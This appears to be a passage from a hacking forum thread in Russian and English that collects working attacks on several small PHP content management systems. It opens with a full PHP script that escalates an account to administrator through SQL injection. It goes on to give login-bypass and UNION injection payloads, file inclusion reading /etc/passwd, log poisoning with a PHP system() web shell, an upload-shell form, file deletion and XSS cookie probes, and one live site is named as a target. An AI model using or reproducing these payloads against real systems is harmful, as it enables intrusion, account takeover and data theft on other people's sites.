'target.com'; // URl target host example.com, don't use / (slash))! $path = '/'; // Path to target folder $login = 'YouLogin'; // Enter you login $password = 'Password?'; // Enter you password $newpass = 'NewPassword :)'; // This is you new password, for you account $groupid = 1; // You new GROUPID, 1 = administrator. function auth($login, $password) // Function auth on site, and get cookie { global $host, $path, $authscript; $newpath = $path . 'artpublic/includes/verif_user.php'; $data = 'login=' . $login . '&pass=' . $password; $fp = fsockopen($host, 80); fputs($fp, "POST $newpath HTTP/1.1\r\n"); fputs($fp, "Host: $host\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: " . strlen($data) . "\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data); while (!feof($fp)) { $result .= fgets($fp, 128); } if (stripos($result, "index.php")) { preg_match('#Set-Cookie:(.*);#iU', $result, $match); //list($name,$value) = explode('=',$match[1]); echo ("Authorisation: COMPLETE!..."); return (trim($match[1]) . ';'); } else { die("Authorisation: FAILED!"); } } function exploit($cookie) // Function exploit, change you group, password. { global $host, $path, $authscript, $newpass, $groupid, $login; $newpath = $path . 'artpublic/utilisateurs/modif_inscription.php'; $data = "prenom=HelloByExploit&nom=HelloByExploit&login2=$login',id_ugroup='".$groupid."',passUtilisateur=PASSWORD('" . $newpass . "'),passUtilisateurMD5='" . md5($newpass) . "'+where+loginUtilisateur='" . $login . "'+--+&login=$login&pass=1234&pass2=1234"; $fp = fsockopen($host, 80); fputs($fp, "POST $newpath HTTP/1.1\r\n"); fputs($fp, "Host: $host\r\n"); fputs($fp, "Referer: $referer\r\n"); fputs($fp, "Cookie: $cookie\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: " . strlen($data) . "\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data); echo '<br>Login: ' . $login; echo '<br>Password: ' . $newpass; } exploit(auth($login, $password)); ?>
Siman! Продукт SiMan CMS 1.5 скачать тут SQL inj index.php PHP: ... $_getvars=$_GET; $_postvars=$_POST; $_cookievars=$_COOKIE; $_servervars=$_SERVER; $_uplfilevars=$_FILES; ... PHP: ...$module=$_getvars["m"]; $mode=$_getvars["d"]; $special['sql']['count']=0; if (count($_getvars)==0) $special['is_index_page']=1; if (empty($module) || strpos($module, ':') || strpos($module, '.') || strpos($module, '/') || strpos($module, '\\'))... PHP: ...if ($module<>'404') include('modules/'.$module.'.php');... /modules/account.php PHP: ...$modules[$modules_index]["module"]='account'; $modules[$modules_index]["title"]=$lang["register"]; $login=$_postvars["p_login"]; $password=$_postvars["p_password"]; $password2=$_postvars["p_password2"];... PHP: ...sql="SELECT * FROM ".$tableusersprefix."users WHERE login = '$login'"; $result=database_db_query($nameDB, $sql, $lnkDB); $u=0; while ($row=database_fetch_object($result)) { if (strcmp($row->login, $login)==0) { $u=1; } } if ($u!=1) { include('ext/register.php'); } if ($u==1)... Условие: mg=off durability and result: action="index.php?m=account&d=login" , метод post поле login_d [SQL] поле passwd_d Тулим: login_d = admin' or 1=1/* разные вариации /*, -- # ... , просто есть beta версия CMS Мы внутри! Реальный пример: http://my-tut.org.ua/index.php?m=account&d=login login_d admin' or 1=1 -- passwd_d безразницы!
Product: JaF CMS Version: 4.0 Author: http://jaf-cms.sourceforge.net/ Remote File Inclusion Need: register_globals = on; File: /module/forum/main.php PHP: if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;} if(!isset($csv_include))require($website.$main_dir."inc/csvfile.php"); if(!isset($fd))require($website.$main_dir."inc/functions.php"); ... Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=http://google.com%00 and: File: /module/forum/forum.php PHP: if(!isset($csv_include))require($website.$main_dir."inc/csvfile.php"); if(!isset($fd))require($website.$main_dir."inc/functions.php"); ?> .... If, allow_url_include = off, use this: Code Exec File: online.php PHP: if(getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif(getenv("HTTP_X_FORWARDED_FOR")) { echo 'f'; $ip = getenv("HTTP_X_FORWARDED_FOR"); } else { $ip = getenv("REMOTE_ADDR"); } ... $user_write = fopen("$log_file", "w"); fputs($user_write , $to_write ); fclose($user_write ); First step, enter you browser this url: http://targethost.com/online.php, and send this headers: Code: Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip,deflate [B]X-Forwarded-For: [COLOR=Red]<?php system($_GET[sec]); ?>[/COLOR][/B] Ok, next step - include log-file. Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=../files/visitors%00&sec=dir
Чесно скажу >стыдно постить< - каменный век, но все же: Продукт netious-cms-serv-0.4 Сайт : http://www.netious.com/ SQL inj /[путь админки указ. при установке далее -1-]/index.php PHP: ...$result=mysql_query("SELECT AdminId FROM mycmsadmin WHERE username='$username' and password='".sha1($password)."'"); $row=mysql_fetch_row($result); $num_rows = mysql_num_rows($result);... Result: username admin' or 1=1-- пасс любой! Внутри SQL inj /index.php PHP: ...$saction="deny"; if ($sresult=mysql_query("SELECT Secured FROM pages WHERE PageId='$pageid'")) {$srow=mysql_fetch_row($sresult);... Result: Code: http://netious/index.php?pageid=1[COLOR=Red][SQL][/COLOR] Code: http://netious/index.php?pageid=1'+and+0+union+select+1,version(),3--+ Условия: register_globals=on magic_quotes=off XSS + SQL inj [-1-]/addtomenuResponse.php PHP: ...mysql_query("INSERT into pages VALUES ('','$refid','$name','$thisdescription','$thiskeywords','$alias','0','$pagetype','','$pagesecured')") or die("Something went wrong: <br />".mysql_error());... include.php PHP: ...function commonheader($pageid,$title,$keywords,$description,$forcedid) { if ($pageid!="-1" && $pageid!="contact") { $result=mysql_query("SELECT Name, Keywords, Description FROM pages WHERE PageId='$pageid'"); $row=mysql_fetch_row($result); $name=$row[0]; $thiskeywords=$row[1]; $thisdescription=$row[2]; if ($forcedid=="no") {$title="$name :: $title";}... echo " <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"> <html xmlns=\"http://www.w3.org/1999/xhtml\"> <head> <title>$title</title>... Дырявый как #
Product: VarioCMS Version: 0.5.6 Author:: http://sourceforge.net/projects/variocms/ SQL-Inj Need: mq=off; File: /plugins/system/slideshow/upload.php PHP: if (isset($_GET['album_id'])) { $album_id = $_GET['album_id']; } .... $sql_insert = "INSERT INTO " . $db_plugin_prefix . "slideshow (album, albumid, image, thumbnail, position) VALUES ('$album', '$album_id', '$image', '0', '$position')"; fputs($logfile, "$sql_insert\n"); Target: http://localhost/bugs/VarioCMS/plugins/system/slideshow/upload.php?album=1&album_id=1'{SQL}. Columns: 7 Upload Shell Need: none. File: /plugins/system/slideshow/upload.php PHP: if (isset($_GET['album_id'])) { $album_id = $_GET['album_id']; } .. foreach ($_FILES as $file => $fileArray) { echo("File key: $file\n"); foreach ($fileArray as $item=>$val) { } //Let's manipulate the received file: in this demo, we just want to remove it! $new_dir = $slideshow_path . $album_id; if (file_exists($new_dir) == false) { mkdir ($new_dir); mkdir ($new_dir . "/fullsize"); mkdir ($new_dir . "/slideshow"); mkdir ($new_dir . "/thumbnails"); } $upload_dir = $slideshow_path . $album_id . "/"; $position = 65000; if (move_uploaded_file($fileArray['tmp_name'], $upload_dir . uml2nouml($fileArray['name']))) { Target: Expl0it ^_^: Code: <form enctype="multipart/form-data" action="http://targethost.com/plugins/system/slideshow/upload.php?album=1" method="get" > <input type="file" name="Filedata" /><input type="submit" /> <input type="text" name="album_id" value="[COLOR=Red][B]../../[/B][/COLOR]"/> </form> album_id = folder to upload shell.
Product: PithCMS Version: 0.9.5 Author: http://sourceforge.net/projects/pithcms/ Local File Inclusion File: newsreader.php Need: rg=on; PHP: include ("admin/lang/$lang"); include ("_read_config.inc.php"); include_once ("inc/cleaner.inc.php"); Target: http://targethost.com/newsreader.php?lang=../../../../../../etc/passwd File: admin/blog.php Need:logged on target site! PHP: session_start(); if (!isset($_SESSION['user'])) { echo "<h2>ACCESS DENIED AND LOGGED</h2>"; exit; } ... f (isset($_POST['filename'])) { //include ("$rootdir/articles/".$_POST['filename']); include ("../news/".$_POST['filename']); }else{ ... Target: {POST} http://targethost.com/admin/blog.php?filename=../../../../../../../../../etc/passwd Remove arbitrary file File: admin/download_remove.php Need: logged on target site! PHP: if (isset($_POST['file']) && ($_POST['file'] != "lista.php") && ($_POST['file'] != "index.php") && ($_POST['file'] != "")) { $file = trim($_POST['file']); $object = ("../downloads/$file"); Target: {POST} http://targethost.com/admin/download_remove.php?file=../indeX.php
MusicBox v3.3 SQL Injection: /blogs.php?action=edit&newsid=-1+union+select+concat_ws(0x3a,user(),database(),version())+--+ /genre_artists.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7+--+ Пассивная XSS: /index.php?in=artist&term=%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3EE&action=search&start=0&x=0&y=0 /index.php?action=top&show=5&type=Artists+order+by+1+--+%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3E Активная XSS: /member.php?uname=кому будем посылать XSS, в комменты <sсriрt>alert(document.cookie);</sсriрt> По идеи почти каждый параметр уязвим. /phpinfo.php
